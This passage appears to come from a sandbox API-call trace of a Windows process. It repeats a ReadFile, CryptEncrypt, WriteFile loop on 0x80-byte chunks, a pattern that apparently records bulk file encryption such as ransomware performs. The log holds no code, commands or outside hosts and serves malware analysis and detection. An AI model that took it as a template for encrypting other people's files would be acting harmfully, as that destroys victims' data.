lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.833] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.833] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.833] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.833] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.833] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.834] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.834] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.834] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.834] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.834] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.834] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.834] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.834] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.834] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.835] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.835] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.835] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.835] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.835] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.835] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.835] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.835] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.835] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.836] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.836] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.836] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.836] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.836] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.836] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.836] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.836] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.837] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.837] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.837] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.837] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.837] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.837] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.837] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.837] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.837] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, 